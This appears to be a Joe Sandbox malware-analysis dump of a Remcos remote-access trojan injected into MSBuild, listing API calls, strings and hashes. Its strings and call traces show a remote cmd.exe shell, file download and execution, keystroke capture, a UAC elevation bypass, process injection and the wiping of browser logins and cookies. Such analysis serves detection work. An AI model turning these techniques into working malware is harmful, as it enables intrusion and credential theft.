                                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                        • API String ID: 2918587301-599666313
                                                                                                                        • Opcode ID: feca6684fce2c2db025fdbbb39b393b62026ffe9abbb33392957b1be0ebca74f
                                                                                                                        • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                        • Opcode Fuzzy Hash: feca6684fce2c2db025fdbbb39b393b62026ffe9abbb33392957b1be0ebca74f
                                                                                                                        • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                        • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                        • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                        • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                        • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                        • API String ID: 3815868655-81343324
                                                                                                                        • Opcode ID: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                        • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                        • Opcode Fuzzy Hash: c5c25fea02136d832433109724d9b2fd2cfe10b9d582a035314f1e06b45d0376
                                                                                                                        • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                        • API String ID: 65172268-860466531
                                                                                                                        • Opcode ID: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                        • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                        • Opcode Fuzzy Hash: 6bb724df5b67df371780ca0b8c3fa9dacbf220518a995c3a182ab50fa5fe6213
                                                                                                                        • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                                        • Opcode ID: 9e054693df0014b2dd5a04db660c3abf1fb9ec8942d5a79e0294493ac8abc5ef
                                                                                                                        • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                        • Opcode Fuzzy Hash: 9e054693df0014b2dd5a04db660c3abf1fb9ec8942d5a79e0294493ac8abc5ef
                                                                                                                        • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                        • API String ID: 3527384056-432212279
                                                                                                                        • Opcode ID: 9416c16fafc90949b133e07b3667b00ba5688b0f9ef9d0859adbcaa53ffad0a4
                                                                                                                        • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                        • Opcode Fuzzy Hash: 9416c16fafc90949b133e07b3667b00ba5688b0f9ef9d0859adbcaa53ffad0a4
                                                                                                                        • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                        • API String ID: 726551946-3025026198
                                                                                                                        • Opcode ID: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                        • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                        • Opcode Fuzzy Hash: 41470707ce2cf1d296282bdd86645310f2a90acdf384f79c6299c5c0c6affc21
                                                                                                                        • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                                        • API String ID: 0-3177665633
                                                                                                                        • Opcode ID: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                        • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                        • Opcode Fuzzy Hash: dc3d60b63999588b41a60ffc37880a3031f904f50fb3e0113cd6e02121726fea
                                                                                                                        • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                        • String ID: 8[G
                                                                                                                        • API String ID: 1888522110-1691237782
                                                                                                                        • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                        • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                        • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                        • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00406788
                                                                                                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object_wcslen
                                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                        • API String ID: 240030777-3166923314
                                                                                                                        • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                        • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                        • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                        • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                        • GetLastError.KERNEL32 ref: 00419935
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3587775597-0
                                                                                                                        • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                        • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                        • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                        • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                        • String ID: <D$<D$<D
                                                                                                                        • API String ID: 745075371-3495170934
                                                                                                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                        • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                        • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769

APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
• GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• API String ID: 2341273852-0

APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: @CG$XCG$`HG$`HG$>G
• API String ID: 341183262-3780268858

APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• [Chrome StoredLogins not found], xrefs: 0040B27B
• UserProfile, xrefs: 0040B227
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
• OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
• GetLastError.KERNEL32 ref: 00416B02
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543

Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908

APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• API String ID: 4043647387-0

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• API String ID: 276877138-0

APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
• GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036

APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
                                                                                                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                        • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                        • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59

APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
